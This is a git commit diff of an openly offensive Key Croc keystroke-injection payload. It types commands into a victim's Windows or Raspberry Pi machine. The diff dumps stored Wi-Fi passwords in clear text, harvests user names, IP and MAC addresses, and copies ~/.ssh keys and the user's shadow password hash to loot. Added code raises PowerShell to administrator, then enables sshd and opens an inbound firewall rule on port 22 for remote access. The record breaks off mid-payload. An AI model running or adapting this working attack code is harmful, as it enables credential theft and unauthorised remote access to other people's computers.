commit
4b2dd609e8
|
@ -3,7 +3,7 @@
|
||||||
# This will collect some data off target PC (ip address, current user name, pc host name, ssid and passwd, mac address)
|
# This will collect some data off target PC (ip address, current user name, pc host name, ssid and passwd, mac address)
|
||||||
# save to tools/Croc_pot folder
|
# save to tools/Croc_pot folder
|
||||||
# Author: Spywill
|
# Author: Spywill
|
||||||
# Version: 1.3.9
|
# Version: 1.4.1
|
||||||
# Category: Key Croc
|
# Category: Key Croc
|
||||||
|
|
||||||
MATCH crocpot
|
MATCH crocpot
|
||||||
|
@ -21,7 +21,7 @@ fi
|
||||||
|
|
||||||
#---> Save keycroc passwd in temp folder
|
#---> Save keycroc passwd in temp folder
|
||||||
#---> This is used for starting Reverse SSH Tunnel with Target PC
|
#---> This is used for starting Reverse SSH Tunnel with Target PC
|
||||||
echo "${CROC_PW}" >> /tmp/CPW.txt
|
echo "${CROC_PW}" > /tmp/CPW.txt
|
||||||
|
|
||||||
#---> Create Croc_Pot folders
|
#---> Create Croc_Pot folders
|
||||||
if [[ -d "/root/udisk/loot/Croc_Pot" && "/root/udisk/tools/Croc_Pot" ]]; then
|
if [[ -d "/root/udisk/loot/Croc_Pot" && "/root/udisk/tools/Croc_Pot" ]]; then
|
||||||
|
@ -33,6 +33,8 @@ fi
|
||||||
#---> Payload variable/remove existing OS detection
|
#---> Payload variable/remove existing OS detection
|
||||||
CROC_OS=/root/udisk/tools/Croc_Pot/Croc_OS.txt
|
CROC_OS=/root/udisk/tools/Croc_Pot/Croc_OS.txt
|
||||||
rm /root/udisk/tools/Croc_Pot/Croc_OS_Target.txt /root/udisk/tools/Croc_Pot/shark_ip.txt
|
rm /root/udisk/tools/Croc_Pot/Croc_OS_Target.txt /root/udisk/tools/Croc_Pot/shark_ip.txt
|
||||||
|
rm /root/udisk/tools/Croc_Pot/squirrel_mac.txt /root/udisk/tools/Croc_Pot/turtle_mac.txt
|
||||||
|
rm /root/udisk/tools/Croc_Pot/NumLock.txt
|
||||||
|
|
||||||
#---> Enter ethernet mode for OS detection
|
#---> Enter ethernet mode for OS detection
|
||||||
ATTACKMODE AUTO_ETHERNET
|
ATTACKMODE AUTO_ETHERNET
|
||||||
|
@ -52,127 +54,143 @@ WINDOWS)
|
||||||
ATTACKMODE HID STORAGE
|
ATTACKMODE HID STORAGE
|
||||||
sleep 1
|
sleep 1
|
||||||
#---> Start windows powershell
|
#---> Start windows powershell
|
||||||
Q GUI r
|
Q GUI r ; sleep 1
|
||||||
sleep 1
|
|
||||||
Q STRING "powershell"
|
Q STRING "powershell"
|
||||||
Q ENTER
|
Q ENTER ; sleep 5
|
||||||
sleep 5
|
#---> Start windows powershell with administrator privileges
|
||||||
|
Q STRING "start-process powershell -verb runas ; exit"
|
||||||
|
Q ENTER ; sleep 3
|
||||||
|
Q LEFTARROW ; sleep 1
|
||||||
|
Q ENTER ; sleep 3
|
||||||
|
#---> Check numlock state on or off
|
||||||
|
Q STRING "\$wsh = New-Object -ComObject WScript.Shell ; if ([console]::NumberLock -eq \$false) { \$wsh.SendKeys('{NUMLOCK}') ; echo \"NUMLOCK TRUN ON\" } else { echo \"NUMLOCK ON\" }"
|
||||||
|
Q ENTER ; sleep 2
|
||||||
#---> Place keycroc usb drive into variable
|
#---> Place keycroc usb drive into variable
|
||||||
Q STRING "\$Croc = (gwmi win32_volume -f 'label=\"KeyCroc\"' | Select-Object -ExpandProperty DriveLetter)"
|
Q STRING "\$Croc = (gwmi win32_volume -f 'label=\"KeyCroc\"' | Select-Object -ExpandProperty DriveLetter)"
|
||||||
Q ENTER
|
Q ENTER ; sleep 2
|
||||||
sleep 1
|
#---> Save numlock state to tools/Croc_Pot/Numlock.txt
|
||||||
|
Q STRING "[console]::NumberLock | out-file -encoding UTF8 \"\$Croc\tools\Croc_Pot\NumLock.txt\" -noclobber -append"
|
||||||
|
Q ENTER ; sleep 2
|
||||||
#---> Retrieve target PC user name & save to tools/Croc_Pot/Croc_OS_Target.txt
|
#---> Retrieve target PC user name & save to tools/Croc_Pot/Croc_OS_Target.txt
|
||||||
Q STRING "\$env:UserName | Format-Table -AutoSize | out-file -encoding UTF8 \"\$Croc\tools\Croc_Pot\Croc_OS_Target.txt\" -noclobber -append"
|
Q STRING "\$env:UserName | Format-Table -AutoSize | out-file -encoding UTF8 \"\$Croc\tools\Croc_Pot\Croc_OS_Target.txt\" -noclobber -append"
|
||||||
Q ENTER
|
Q ENTER ; sleep 2
|
||||||
sleep 1
|
|
||||||
#---> Retrieve target PC IP address & save to tools/Croc_Pot/Croc_OS_Target.txt
|
#---> Retrieve target PC IP address & save to tools/Croc_Pot/Croc_OS_Target.txt
|
||||||
Q STRING "Get-CimInstance -Class Win32_NetworkAdapterConfiguration -Filter IPEnabled=\$true | Select-Object -ExpandProperty IPAddress | Format-Table -AutoSize | out-file -encoding UTF8 \"\$Croc\tools\Croc_Pot\Croc_OS_Target.txt\" -noclobber -append"
|
Q STRING "Get-CimInstance -Class Win32_NetworkAdapterConfiguration -Filter IPEnabled=\$true | Select-Object -ExpandProperty IPAddress | Format-Table -AutoSize | out-file -encoding UTF8 \"\$Croc\tools\Croc_Pot\Croc_OS_Target.txt\" -noclobber -append"
|
||||||
Q ENTER
|
Q ENTER ; sleep 2
|
||||||
sleep 1
|
|
||||||
#---> Retrieve target PC SSID/PASSWD & save to tools/Croc_Pot/Croc_OS_Target.txt
|
#---> Retrieve target PC SSID/PASSWD & save to tools/Croc_Pot/Croc_OS_Target.txt
|
||||||
Q STRING "(netsh wlan show networks) | Select-String \"\:(.+)\$\" | % {\$name=\$_.Matches.Groups[1].Value.Trim(); \$_} | %{(netsh wlan show profile name=\"\$name\" key=clear)} | Select-String \"Key Content\W+\:(.+)\$\" | % {\$pass=\$_.Matches.Groups[1].Value.Trim(); \$_} | %{[PSCustomObject]@{ PROFILE_NAME=\$name;PASSWORD=\$pass }} | out-file -encoding UTF8 \"\$Croc\tools\Croc_Pot\Croc_OS_Target.txt\" -noclobber -append"
|
Q STRING "(netsh wlan show networks) | Select-String \"\:(.+)\$\" | % {\$name=\$_.Matches.Groups[1].Value.Trim(); \$_} | %{(netsh wlan show profile name=\"\$name\" key=clear)} | Select-String \"Key Content\W+\:(.+)\$\" | % {\$pass=\$_.Matches.Groups[1].Value.Trim(); \$_} | %{[PSCustomObject]@{ PROFILE_NAME=\$name;PASSWORD=\$pass }} | out-file -encoding UTF8 \"\$Croc\tools\Croc_Pot\Croc_OS_Target.txt\" -noclobber -append"
|
||||||
Q ENTER
|
Q ENTER ; sleep 2
|
||||||
sleep 2
|
|
||||||
#---> Retrieve target PC MAC address & save to tools/Croc_Pot/Croc_OS_Target.txt
|
#---> Retrieve target PC MAC address & save to tools/Croc_Pot/Croc_OS_Target.txt
|
||||||
Q STRING "wmic nic where PhysicalAdapter=True get MACAddress,Name | Format-Table -AutoSize | out-file -encoding UTF8 \"\$Croc\tools\Croc_Pot\Croc_OS_Target.txt\" -noclobber -append"
|
Q STRING "wmic nic where PhysicalAdapter=True get MACAddress,Name | Format-Table -AutoSize | out-file -encoding UTF8 \"\$Croc\tools\Croc_Pot\Croc_OS_Target.txt\" -noclobber -append"
|
||||||
Q ENTER
|
Q ENTER ; sleep 3
|
||||||
sleep 3
|
|
||||||
#---> Ping network to look for Shark Jack
|
#---> Ping network to look for Shark Jack
|
||||||
Q STRING "ping -n 1 shark.lan | select-string -pattern 'Reply'"
|
Q STRING "ping -n 1 shark.lan | select-string -pattern 'Reply'"
|
||||||
Q ENTER
|
Q ENTER ; sleep 2
|
||||||
sleep 2
|
|
||||||
#---> Retrieve Shark Jack IP if connected to local network as target PC & save to tools/Croc_Pot/shark_ip.txt
|
#---> Retrieve Shark Jack IP if connected to local network as target PC & save to tools/Croc_Pot/shark_ip.txt
|
||||||
Q STRING "[System.Net.Dns]::GetHostAddresses(\"shark.lan\")[0].IPAddressToString | Format-Table -AutoSize | out-file -encoding UTF8 \"\$Croc\tools\Croc_Pot\shark_ip.txt\" -noclobber -append"
|
Q STRING "[System.Net.Dns]::GetHostAddresses(\"shark.lan\")[0].IPAddressToString | Format-Table -AutoSize | out-file -encoding UTF8 \"\$Croc\tools\Croc_Pot\shark_ip.txt\" -noclobber -append"
|
||||||
Q ENTER
|
Q ENTER ; sleep 3
|
||||||
sleep 3
|
|
||||||
#---> Place Shark Jack IP into variable
|
#---> Place Shark Jack IP into variable
|
||||||
Q STRING "\$jack_mac = [System.Net.Dns]::GetHostAddresses(\"shark.lan\")[0].IPAddressToString"
|
Q STRING "\$jack_mac = [System.Net.Dns]::GetHostAddresses(\"shark.lan\")[0].IPAddressToString"
|
||||||
Q ENTER
|
Q ENTER ; sleep 2
|
||||||
#---> Retrieve Shark Jack MAC address if connected to local network as target PC & save to tools/Croc_Pot/shark_ip.txt
|
#---> Retrieve Shark Jack MAC address if connected to local network as target PC & save to tools/Croc_Pot/shark_ip.txt
|
||||||
Q STRING "arp -a \$jack_mac | Select-String '([0-9a-f]{2}-){5}[0-9a-f]{2}' | Select-Object -Expand Matches | Select-Object -Expand Value | out-file -encoding UTF8 \"\$Croc\tools\Croc_Pot\shark_ip.txt\" -noclobber -append"
|
Q STRING "arp -a \$jack_mac | Select-String '([0-9a-f]{2}-){5}[0-9a-f]{2}' | Select-Object -Expand Matches | Select-Object -Expand Value | out-file -encoding UTF8 \"\$Croc\tools\Croc_Pot\shark_ip.txt\" -noclobber -append"
|
||||||
Q ENTER
|
Q ENTER ; sleep 2
|
||||||
sleep 2
|
|
||||||
#---> Retrieve packet squirrel MAC address if connected to local network as target PC & save to tools/Croc_Pot/squirrel_mac.txt
|
#---> Retrieve packet squirrel MAC address if connected to local network as target PC & save to tools/Croc_Pot/squirrel_mac.txt
|
||||||
Q STRING "arp -a 172.16.32.1 | Select-String '([0-9a-f]{2}-){5}[0-9a-f]{2}' | Select-Object -Expand Matches | Select-Object -Expand Value | out-file -encoding UTF8 \"\$Croc\tools\Croc_Pot\squirrel_mac.txt\""
|
Q STRING "arp -a 172.16.32.1 | Select-String '([0-9a-f]{2}-){5}[0-9a-f]{2}' | Select-Object -Expand Matches | Select-Object -Expand Value | out-file -encoding UTF8 \"\$Croc\tools\Croc_Pot\squirrel_mac.txt\""
|
||||||
Q ENTER
|
Q ENTER ; sleep 2
|
||||||
sleep 2
|
|
||||||
#---> Ping network to look for Lan turtle
|
#---> Ping network to look for Lan turtle
|
||||||
Q STRING "ping -n 1 turtle.lan | select-string -pattern 'Reply'"
|
Q STRING "ping -n 1 turtle.lan | select-string -pattern 'Reply'"
|
||||||
Q ENTER
|
Q ENTER ; sleep 2
|
||||||
sleep 2
|
|
||||||
#---> Retrieve Lan turtle IP if connected to local network as target PC & save to tools/Croc_Pot/turtle_mac.txt
|
#---> Retrieve Lan turtle IP if connected to local network as target PC & save to tools/Croc_Pot/turtle_mac.txt
|
||||||
Q STRING "[System.Net.Dns]::GetHostAddresses(\"turtle.lan\")[0].IPAddressToString | Format-Table -AutoSize | out-file -encoding UTF8 \"\$Croc\tools\Croc_Pot\turtle_mac.txt\""
|
Q STRING "[System.Net.Dns]::GetHostAddresses(\"turtle.lan\")[0].IPAddressToString | Format-Table -AutoSize | out-file -encoding UTF8 \"\$Croc\tools\Croc_Pot\turtle_mac.txt\""
|
||||||
Q ENTER
|
Q ENTER ; sleep 3
|
||||||
sleep 3
|
|
||||||
#---> Place Lan turtle IP into variable
|
#---> Place Lan turtle IP into variable
|
||||||
Q STRING "\$turtle_mac = [System.Net.Dns]::GetHostAddresses(\"turtle.lan\")[0].IPAddressToString"
|
Q STRING "\$turtle_mac = [System.Net.Dns]::GetHostAddresses(\"turtle.lan\")[0].IPAddressToString"
|
||||||
Q ENTER
|
Q ENTER ; sleep 2
|
||||||
sleep 2
|
|
||||||
#---> Retrieve Lan turtle MAC address if connected to local network as target PC & save to tools/Croc_Pot/turtle_mac.txt
|
#---> Retrieve Lan turtle MAC address if connected to local network as target PC & save to tools/Croc_Pot/turtle_mac.txt
|
||||||
Q STRING "arp -a \$turtle_mac | Select-String '([0-9a-f]{2}-){5}[0-9a-f]{2}' | Select-Object -Expand Matches | Select-Object -Expand Value | out-file -encoding UTF8 \"\$Croc\tools\Croc_Pot\turtle_mac.txt\" -noclobber -append"
|
Q STRING "arp -a \$turtle_mac | Select-String '([0-9a-f]{2}-){5}[0-9a-f]{2}' | Select-Object -Expand Matches | Select-Object -Expand Value | out-file -encoding UTF8 \"\$Croc\tools\Croc_Pot\turtle_mac.txt\" -noclobber -append"
|
||||||
Q ENTER
|
Q ENTER ; sleep 2
|
||||||
sleep 2
|
|
||||||
#---> Retrieve Bash Bunny MAC address if connected to local network as target PC ensure bunny is connected to network & save to tools/Croc_Pot/bunny_mac.txt
|
#---> Retrieve Bash Bunny MAC address if connected to local network as target PC ensure bunny is connected to network & save to tools/Croc_Pot/bunny_mac.txt
|
||||||
Q STRING "arp -a 172.16.64.1 | Select-String '([0-9a-f]{2}-){5}[0-9a-f]{2}' | Select-Object -Expand Matches | Select-Object -Expand Value | out-file -encoding UTF8 \"\$Croc\tools\Croc_Pot\bunny_mac.txt\""
|
Q STRING "arp -a 172.16.64.1 | Select-String '([0-9a-f]{2}-){5}[0-9a-f]{2}' | Select-Object -Expand Matches | Select-Object -Expand Value | out-file -encoding UTF8 \"\$Croc\tools\Croc_Pot\bunny_mac.txt\""
|
||||||
Q ENTER
|
Q ENTER ; sleep 2
|
||||||
sleep 2
|
|
||||||
#---> sed to remove powershell output "\r" endlines
|
#---> sed to remove powershell output "\r" endlines
|
||||||
$(sed -i 's/\r//g' /root/udisk/tools/Croc_Pot/Croc_OS_Target.txt /root/udisk/tools/Croc_Pot/shark_ip.txt /root/udisk/tools/Croc_Pot/squirrel_mac.txt /root/udisk/tools/Croc_Pot/turtle_mac.txt /root/udisk/tools/Croc_Pot/bunny_mac.txt)
|
$(sed -i 's/\r//g' /root/udisk/tools/Croc_Pot/Croc_OS_Target.txt /root/udisk/tools/Croc_Pot/shark_ip.txt /root/udisk/tools/Croc_Pot/squirrel_mac.txt /root/udisk/tools/Croc_Pot/turtle_mac.txt /root/udisk/tools/Croc_Pot/bunny_mac.txt /root/udisk/tools/Croc_Pot/NumLock.txt)
|
||||||
#---> sed to return only readable character
|
#---> sed to return only readable character
|
||||||
$(sed -i $'s/[^[:print:]\t]//g' /root/udisk/tools/Croc_Pot/Croc_OS_Target.txt /root/udisk/tools/Croc_Pot/shark_ip.txt /root/udisk/tools/Croc_Pot/squirrel_mac.txt /root/udisk/tools/Croc_Pot/turtle_mac.txt /root/udisk/tools/Croc_Pot/bunny_mac.txt)
|
$(sed -i $'s/[^[:print:]\t]//g' /root/udisk/tools/Croc_Pot/Croc_OS_Target.txt /root/udisk/tools/Croc_Pot/shark_ip.txt /root/udisk/tools/Croc_Pot/squirrel_mac.txt /root/udisk/tools/Croc_Pot/turtle_mac.txt /root/udisk/tools/Croc_Pot/bunny_mac.txt /root/udisk/tools/Croc_Pot/NumLock.txt)
|
||||||
#---> sed to remove powershell output first "?" character
|
#---> sed to remove powershell output first "?" character
|
||||||
$(sed -i '0,/./s/^.//' /root/udisk/tools/Croc_Pot/Croc_OS_Target.txt /root/udisk/tools/Croc_Pot/shark_ip.txt /root/udisk/tools/Croc_Pot/squirrel_mac.txt /root/udisk/tools/Croc_Pot/bunny_mac.txt /root/udisk/tools/Croc_Pot/turtle_mac.txt)
|
$(sed -i '0,/./s/^.//' /root/udisk/tools/Croc_Pot/Croc_OS_Target.txt /root/udisk/tools/Croc_Pot/shark_ip.txt /root/udisk/tools/Croc_Pot/squirrel_mac.txt /root/udisk/tools/Croc_Pot/bunny_mac.txt /root/udisk/tools/Croc_Pot/turtle_mac.txt /root/udisk/tools/Croc_Pot/NumLock.txt)
|
||||||
#---> sed to replace "-" with ":"
|
#---> sed to replace "-" with ":"
|
||||||
$(sed -i 's/-/:/g' /root/udisk/tools/Croc_Pot/shark_ip.txt /root/udisk/tools/Croc_Pot/squirrel_mac.txt /root/udisk/tools/Croc_Pot/turtle_mac.txt /root/udisk/tools/Croc_Pot/bunny_mac.txt)
|
$(sed -i 's/-/:/g' /root/udisk/tools/Croc_Pot/shark_ip.txt /root/udisk/tools/Croc_Pot/squirrel_mac.txt /root/udisk/tools/Croc_Pot/turtle_mac.txt /root/udisk/tools/Croc_Pot/bunny_mac.txt)
|
||||||
#---> Return back to ATTACKMODE HID mode
|
#---> Return back to ATTACKMODE HID mode
|
||||||
ATTACKMODE HID
|
ATTACKMODE HID
|
||||||
sleep 1 ;;
|
sleep 1
|
||||||
|
#----> Check with nmap SSH status of target pc
|
||||||
|
#----> Make sure that Windows Defender Firewall allows inbound connections to Windows through TCP port 22:
|
||||||
|
case $(nmap `sed -n 2p /root/udisk/tools/Croc_Pot/Croc_OS_Target.txt` -PN -p ssh | egrep -o 'open|closed|filtered') in
|
||||||
|
open)
|
||||||
|
Q STRING "Get-Service sshd ; Get-NetFirewallRule -Name *OpenSSH-Server* | select Name, DisplayName, Description, Enabled"
|
||||||
|
Q ENTER ;;
|
||||||
|
closed)
|
||||||
|
Q STRING "Service sshd is Closed trying to Enable SSH Server" ; Q ENTER ; sleep 2
|
||||||
|
Q STRING "Set-Service -Name sshd -StartupType 'Automatic' ; Start-Service sshd"
|
||||||
|
Q ENTER ; sleep 2
|
||||||
|
Q STRING "New-NetFirewallRule -Name sshd -DisplayName 'OpenSSH Server (sshd)' -Enabled True -Direction Inbound -Protocol TCP -Action Allow -LocalPort 22"
|
||||||
|
Q ENTER ; sleep 2
|
||||||
|
Q STRING "restart-service sshd"
|
||||||
|
Q ENTER ; sleep 2
|
||||||
|
Q STRING "Get-Service sshd ; Get-NetFirewallRule -Name *OpenSSH-Server* | select Name, DisplayName, Description, Enabled"
|
||||||
|
Q ENTER ;;
|
||||||
|
filtered)
|
||||||
|
Q STRING "Service sshd is filtered trying to Enable SSH Server" ; Q ENTER ; sleep 2
|
||||||
|
Q STRING "Set-Service -Name sshd -StartupType 'Automatic' ; Start-Service sshd"
|
||||||
|
Q ENTER ; sleep 2
|
||||||
|
Q STRING "New-NetFirewallRule -Name sshd -DisplayName 'OpenSSH Server (sshd)' -Enabled True -Direction Inbound -Protocol TCP -Action Allow -LocalPort 22"
|
||||||
|
Q ENTER ; sleep 2
|
||||||
|
Q STRING "restart-service sshd"
|
||||||
|
Q ENTER ; sleep 2
|
||||||
|
Q STRING "Get-Service sshd ; Get-NetFirewallRule -Name *OpenSSH-Server* | select Name, DisplayName, Description, Enabled"
|
||||||
|
Q ENTER ;;
|
||||||
|
*)
|
||||||
|
Q STRING "Service sshd unknow" ; Q ENTER ; sleep 1 ;;
|
||||||
|
esac
|
||||||
|
sleep 6 ; Q ENTER ; sleep 2 ;;
|
||||||
MACOS)
|
MACOS)
|
||||||
#---> Return back to ATTACKMODE HID mode
|
#---> Return back to ATTACKMODE HID mode
|
||||||
ATTACKMODE HID
|
ATTACKMODE HID
|
||||||
LED G
|
LED G ; sleep 1
|
||||||
sleep 1
|
|
||||||
#---> Start mac os terminal
|
#---> Start mac os terminal
|
||||||
Q GUI-SPACE
|
Q GUI-SPACE ; sleep 1
|
||||||
sleep 1
|
|
||||||
Q STRING "terminal"
|
Q STRING "terminal"
|
||||||
Q ENTER
|
Q ENTER ; sleep 1 ;;
|
||||||
sleep 1 ;;
|
|
||||||
LINUX)
|
LINUX)
|
||||||
#---> Enter Storage mode on keycroc
|
#---> Enter Storage mode on keycroc
|
||||||
ATTACKMODE HID STORAGE
|
ATTACKMODE HID STORAGE
|
||||||
LED B
|
LED B ; sleep 3
|
||||||
sleep 3
|
|
||||||
#---> After TARGET_HOSTNAME scan case TARGET_HOSTNAME value
|
#---> After TARGET_HOSTNAME scan case TARGET_HOSTNAME value
|
||||||
case $TARGET_HOSTNAME in
|
case $TARGET_HOSTNAME in
|
||||||
raspberrypi)
|
raspberrypi)
|
||||||
#---> Start Raspberry pi 4 LXTerminal
|
#---> Start Raspberry pi 4 LXTerminal
|
||||||
Q CONTROL-ALT-d
|
Q CONTROL-ALT-d
|
||||||
Q CONTROL-ALT-t
|
Q CONTROL-ALT-t
|
||||||
sleep 2
|
sleep 2
|
||||||
#---> Place keycroc usb drive into variable
|
#---> Place keycroc usb drive into variable
|
||||||
Q STRING "PC_USER=/media/\$(whoami)/KeyCroc/tools/Croc_Pot/Croc_OS_Target.txt"
|
Q STRING "PC_USER=/media/\$(whoami)/KeyCroc/tools/Croc_Pot/Croc_OS_Target.txt"
|
||||||
Q ENTER
|
Q ENTER ; sleep 1
|
||||||
sleep 1
|
|
||||||
Q STRING "PC_LOOT=/media/\$(whoami)/KeyCroc/loot/Croc_Pot"
|
Q STRING "PC_LOOT=/media/\$(whoami)/KeyCroc/loot/Croc_Pot"
|
||||||
Q ENTER
|
Q ENTER ; sleep 1
|
||||||
sleep 1
|
|
||||||
#---> Check numlock state on or off
|
#---> Check numlock state on or off
|
||||||
Q STRING "xset -q | grep -Po '(?<=Num Lock:)\W*\K[^ ]*' | tee /media/\$(whoami)/KeyCroc/tools/Croc_Pot/NumLock.txt"
|
Q STRING "xset -q | grep -Po '(?<=Num Lock:)\W*\K[^ ]*' | tee /media/\$(whoami)/KeyCroc/tools/Croc_Pot/NumLock.txt"
|
||||||
Q ENTER
|
Q ENTER ; sleep 1
|
||||||
sleep 1
|
|
||||||
if [ "$(sed -n 1p /root/udisk/tools/Croc_Pot/NumLock.txt)" = off ]; then
|
if [ "$(sed -n 1p /root/udisk/tools/Croc_Pot/NumLock.txt)" = off ]; then
|
||||||
Q NUMLOCK
|
Q NUMLOCK
|
||||||
fi
|
fi
|
||||||
#---> Retrieve target PC user name & save to tools/Croc_Pot/Croc_OS_Target.txt
|
#---> Retrieve target PC user name & save to tools/Croc_Pot/Croc_OS_Target.txt
|
||||||
Q STRING "whoami | tee \${PC_USER}"
|
Q STRING "whoami | tee \${PC_USER}"
|
||||||
Q ENTER
|
Q ENTER ; sleep 1
|
||||||
sleep 1
|
|
||||||
#---> Retrieve target PC IP address & save to tools/Croc_Pot/Croc_OS_Target.txt
|
#---> Retrieve target PC IP address & save to tools/Croc_Pot/Croc_OS_Target.txt
|
||||||
Q STRING "ip -4 -o addr show wlan0 | awk '{print \$4}' | cut -d \"/\" -f 1 | tee -a \${PC_USER} && ip -4 -o addr show eth0 | awk '{print \$4}' | cut -d \"/\" -f 1 | tee -a \${PC_USER} && ip -4 -o addr show eth1 | awk '{print \$4}' | cut -d \"/\" -f 1 | tee -a \${PC_USER} && echo '' >> \${PC_USER}"
|
Q STRING "ip -4 -o addr show wlan0 | awk '{print \$4}' | cut -d \"/\" -f 1 | tee -a \${PC_USER} && ip -4 -o addr show eth0 | awk '{print \$4}' | cut -d \"/\" -f 1 | tee -a \${PC_USER} && ip -4 -o addr show eth1 | awk '{print \$4}' | cut -d \"/\" -f 1 | tee -a \${PC_USER} && echo '' >> \${PC_USER}"
|
||||||
Q ENTER
|
Q ENTER ; sleep 1
|
||||||
sleep 1
|
#---> Check with nmap SSH status of target pc
|
||||||
#---> Check SSH status is running
|
|
||||||
if [ "$(nmap `sed -n 2p /root/udisk/tools/Croc_Pot/Croc_OS_Target.txt` -PN -p ssh | egrep -o 'open|closed|filtered')" = "closed" ]; then
|
if [ "$(nmap `sed -n 2p /root/udisk/tools/Croc_Pot/Croc_OS_Target.txt` -PN -p ssh | egrep -o 'open|closed|filtered')" = "closed" ]; then
|
||||||
Q STRING "sudo systemctl start ssh"
|
Q STRING "sudo systemctl start ssh"
|
||||||
Q ENTER
|
Q ENTER
|
||||||
|
@ -183,82 +201,64 @@ raspberrypi)
|
||||||
sleep 1
|
sleep 1
|
||||||
#---> Retrieve target PC SSID/PASSWD & save to tools/Croc_Pot/Croc_OS_Target.txt
|
#---> Retrieve target PC SSID/PASSWD & save to tools/Croc_Pot/Croc_OS_Target.txt
|
||||||
Q STRING "sed -n '/ssid\|psk/,+1p' /etc/wpa_supplicant/wpa_supplicant.conf | sed -e 's/[\"]//g' | tee -a \${PC_USER}"
|
Q STRING "sed -n '/ssid\|psk/,+1p' /etc/wpa_supplicant/wpa_supplicant.conf | sed -e 's/[\"]//g' | tee -a \${PC_USER}"
|
||||||
Q ENTER
|
Q ENTER ; sleep 1
|
||||||
sleep 1
|
|
||||||
#---> Retrieve target PC MAC address & save to tools/Croc_Pot/Croc_OS_Target.txt
|
#---> Retrieve target PC MAC address & save to tools/Croc_Pot/Croc_OS_Target.txt
|
||||||
Q STRING "ip -o link | awk '\$2 != \"lo:\" {print \$2, \$(NF-2)}' | tee -a \${PC_USER}"
|
Q STRING "ip -o link | awk '\$2 != \"lo:\" {print \$2, \$(NF-2)}' | tee -a \${PC_USER}"
|
||||||
Q ENTER
|
Q ENTER ; sleep 2
|
||||||
sleep 2
|
|
||||||
#---> Retrieve Shark Jack IP if connected to local network as target PC & save to tools/Croc_Pot/shark_ip.txt
|
#---> Retrieve Shark Jack IP if connected to local network as target PC & save to tools/Croc_Pot/shark_ip.txt
|
||||||
Q STRING "ping -c1 -w1 shark.lan | grep PING | sed -e \"s/).*//\" | sed -e \"s/.*(//\" | tee /media/\$(whoami)/KeyCroc/tools/Croc_Pot/shark_ip.txt"
|
Q STRING "ping -c1 -w1 shark.lan | grep PING | sed -e \"s/).*//\" | sed -e \"s/.*(//\" | tee /media/\$(whoami)/KeyCroc/tools/Croc_Pot/shark_ip.txt"
|
||||||
Q ENTER
|
Q ENTER ; sleep 2
|
||||||
sleep 2
|
|
||||||
#---> Retrieve Shark Jack MAC address if connected to local network as target PC & save to tools/Croc_Pot/shark_ip.txt
|
#---> Retrieve Shark Jack MAC address if connected to local network as target PC & save to tools/Croc_Pot/shark_ip.txt
|
||||||
Q STRING "arp shark.lan | awk '/'shark.lan'/{print \$3}' | sed -e 's/HWaddress//g' | tee -a /media/\$(whoami)/KeyCroc/tools/Croc_Pot/shark_ip.txt"
|
Q STRING "arp shark.lan | awk '/'shark.lan'/{print \$3}' | sed -e 's/HWaddress//g' | tee -a /media/\$(whoami)/KeyCroc/tools/Croc_Pot/shark_ip.txt"
|
||||||
Q ENTER
|
Q ENTER ; sleep 2
|
||||||
sleep 2
|
|
||||||
#---> Retrieve packet squirrel MAC address if connected to local network as target PC & save to tools/Croc_Pot/squirrel_mac.txt
|
#---> Retrieve packet squirrel MAC address if connected to local network as target PC & save to tools/Croc_Pot/squirrel_mac.txt
|
||||||
Q STRING "arp squirrel.lan | awk '/'squirrel.lan'/{print \$3}' | sed -e 's/HWaddress//g' | tee /media/\$(whoami)/KeyCroc/tools/Croc_Pot/squirrel_mac.txt"
|
Q STRING "arp squirrel.lan | awk '/'squirrel.lan'/{print \$3}' | sed -e 's/HWaddress//g' | tee /media/\$(whoami)/KeyCroc/tools/Croc_Pot/squirrel_mac.txt"
|
||||||
Q ENTER
|
Q ENTER ; sleep 2
|
||||||
sleep 2
|
|
||||||
#---> Retrieve Lan turtle IP if connected to local network as target PC & save to tools/Croc_Pot/turtle_mac.txt
|
#---> Retrieve Lan turtle IP if connected to local network as target PC & save to tools/Croc_Pot/turtle_mac.txt
|
||||||
Q STRING "ping -c1 -w1 turtle | grep PING | sed -e \"s/).*//\" | sed -e \"s/.*(//\" | tee /media/\$(whoami)/KeyCroc/tools/Croc_Pot/turtle_mac.txt"
|
Q STRING "ping -c1 -w1 turtle | grep PING | sed -e \"s/).*//\" | sed -e \"s/.*(//\" | tee /media/\$(whoami)/KeyCroc/tools/Croc_Pot/turtle_mac.txt"
|
||||||
Q ENTER
|
Q ENTER ; sleep 2
|
||||||
sleep 2
|
|
||||||
#---> Retrieve Lan turtle MAC address if connected to local network as target PC & save to tools/Croc_Pot/turtle_mac.txt
|
#---> Retrieve Lan turtle MAC address if connected to local network as target PC & save to tools/Croc_Pot/turtle_mac.txt
|
||||||
Q STRING "arp turtle | awk '/'turtle'/{print \$3}' | sed -e 's/HWaddress//g' | tee -a /media/\$(whoami)/KeyCroc/tools/Croc_Pot/turtle_mac.txt"
|
Q STRING "arp turtle | awk '/'turtle'/{print \$3}' | sed -e 's/HWaddress//g' | tee -a /media/\$(whoami)/KeyCroc/tools/Croc_Pot/turtle_mac.txt"
|
||||||
Q ENTER
|
Q ENTER ; sleep 2
|
||||||
sleep 2
|
|
||||||
#---> Retrieve Bash Bunny MAC address if connected to local network as target PC ensure bunny is connected to network & save to tools/Croc_Pot/bunny_mac.txt
|
#---> Retrieve Bash Bunny MAC address if connected to local network as target PC ensure bunny is connected to network & save to tools/Croc_Pot/bunny_mac.txt
|
||||||
Q STRING "arp 172.16.64.1 | awk '/'172.16.64.1'/{print \$3}' | sed -e 's/HWaddress//g' | tee /media/\$(whoami)/KeyCroc/tools/Croc_Pot/bunny_mac.txt"
|
Q STRING "arp 172.16.64.1 | awk '/'172.16.64.1'/{print \$3}' | sed -e 's/HWaddress//g' | tee /media/\$(whoami)/KeyCroc/tools/Croc_Pot/bunny_mac.txt"
|
||||||
Q ENTER
|
Q ENTER ; sleep 2
|
||||||
sleep 2
|
|
||||||
#---> Retrieve target PC .ssh file save to /loot/Croc_Pot/SSH
|
#---> Retrieve target PC .ssh file save to /loot/Croc_Pot/SSH
|
||||||
Q STRING "sudo cp -fr ~/.ssh/. \${PC_LOOT}/SSH/"
|
Q STRING "sudo cp -fr ~/.ssh/. \${PC_LOOT}/SSH/"
|
||||||
Q ENTER
|
Q ENTER ; sleep 2
|
||||||
sleep 2
|
|
||||||
#---> Retrieve target hash passwd save to /loot/Croc_Pot/target_hash_passwd.txt
|
#---> Retrieve target hash passwd save to /loot/Croc_Pot/target_hash_passwd.txt
|
||||||
Q STRING "sudo getent shadow \$(whoami) | tee \${PC_LOOT}/target_hash_passwd"
|
